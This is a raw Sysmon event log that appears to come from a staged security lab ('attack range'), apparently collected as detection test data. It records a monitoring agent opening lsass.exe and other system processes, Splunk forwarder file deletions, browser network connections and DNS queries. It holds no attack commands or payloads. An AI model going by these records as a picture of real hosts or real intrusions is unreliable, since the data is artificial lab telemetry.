Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018959Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018958Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.580{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018957Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.570{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018956Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.563{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018955Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.554{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018954Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.546{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000018953Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.544{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000018952Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:02.083{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6C6748D4423B2F862A81C0F79428BC,SHA256=3D06052D1A456797AF98ED1984F6EEFD2F92C1763EBC77D2012EB860E95B69A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:01.714{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56511-false10.0.1.12-8000- 23542300x800000000000000048608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:03.683{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BC8C3AB2E0D433BB2EE14892A59FEA4,SHA256=E097B695F9EF0FB4E616599182068073C8F8D5FE807F071A1FCCB748EF5861F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018984Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:03.497{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=472B57EC257D3CB357B155F0EE3D4495,SHA256=36D8FB9646B57E758B995E9C0DCA25F556960CE07A9A7487CA40FA766BDE9B6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:04.828{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7237A7796431F28962EBBBD2ABE6F928,SHA256=358AE8400B16B16A7F29B128BAC400AB9FF74D2A4BB9562D0955055454A38A61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018986Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:04.582{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34F6B727BB789F50EFDD304FBE57C888,SHA256=2A8B28CEA4DF4391075C0350AA63C4F2FC575023F5D982CE6CCBA74D86D614B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018985Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:04.267{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:05.944{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DAEE488A99F2F61EA10082D04C9D91F,SHA256=AA34A2F4A545DAFF70AA8E3D95380F1DC315A3D0E9C02FE09DD5DED093B409B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018988Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:05.652{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=278652E35F21C919A8C10DEE18F2D244,SHA256=23CAF4EC22E240B4B9B694A50C1DF9587C198F12AA0C579DBB0C0E8F5C235B6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018987Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:04.125{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50202-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000048612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:06.962{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65D74789E832A5B0C91CDB58B324E060,SHA256=D04261F8DC64A39FAFADB394EEE21DD77115D578FF83A3DA8E8C95E4D50F8372,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018990Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:06.654{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573C75FEDCB13EA4047024CE7205F1AE,SHA256=312E4521FE7935FE4459E35ED9BCD5D49C4272F520BF24FCFCB878077C523BD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018989Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:05.123{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50203-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018991Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:07.759{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A43E8681AAB9650F993314682A59754D,SHA256=16C74C0D64337DEFBC9FAD95370A259EFD3F25B6E2654EE9FDD9EB0382B83F42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:07.561{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:07.264{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:07.013{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\settings\data.safe.binMD5=3E393FE2A489F5F1168155603FB15384,SHA256=69FD18FFE2E9824C32882140AA56A3F7ADA648ADA8FB7DF369592541F162BCB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018992Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:08.869{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5620E793DD1B0AA4303E2992DC271C35,SHA256=4E63550C26A07BC728D3C77DC90CA91D04587E9F0D4092E0CA2C862F146B6D00,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000048621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:06.291{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304a1887.dscq.akamai.net023.50.52.57;23.50.52.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:06.290{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.50.52.82;::ffff:23.50.52.57;C:\Program Files\Mozilla Firefox\firefox.exe 354300x800000000000000048619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:06.452{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56513-false34.160.144.191191.144.160.34.bc.googleusercontent.com443https 354300x800000000000000048618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:06.279{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58002- 354300x800000000000000048617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:06.247{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56512-false35.241.9.150150.9.241.35.bc.googleusercontent.com443https 23542300x800000000000000048616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:08.012{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A54DCFEBB2A0E9BD8C300EA868670D,SHA256=06ED8E145661411F5B60EBB8DB97019864194B176D981F59A285371587BEF33A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018993Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:09.953{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E9EA65DC4DCD1A415EEB67E57256A7,SHA256=C821A1814E46686C80CBCF0BA6B514A98FE98AEB4539E7752C80422B5F0BD30E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:09.128{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A96A9A19C19E8B4F130898700388D0D,SHA256=6C58CD21D32717E4AB53C79DFA661C205ED19B86366DC4BF4173B638213496CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000048625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:31:10.961{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BITS\Performance\PerfMMFileNameGlobal\MMF_BITS7e438f6e-c903-4937-9b45-6bf3b7291cf7 354300x800000000000000048624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:07.596{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56514-false10.0.1.12-8000- 23542300x800000000000000048623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.159{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E96CEDBB7C5F1B90885C5BC6B7DDD96,SHA256=14CDA3245F7680B6CC7F4D4B6C2B777E88F60AB0504660DD63CF926C0660AE05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018994Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:11.064{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66993AB2D0352E99786559E70AD782D8,SHA256=AF4B6B56370E7C4BEDA40C4B46B86BF7CE2192CBACF30062360308A7F1723202,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.301{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56516-false216.239.32.29any-in-201d.1e100.net80http 354300x800000000000000048674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.285{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59827- 354300x800000000000000048673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.210{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56515-false142.250.190.67ord37s34-in-f3.1e100.net443https 10341000x800000000000000048672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.853{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 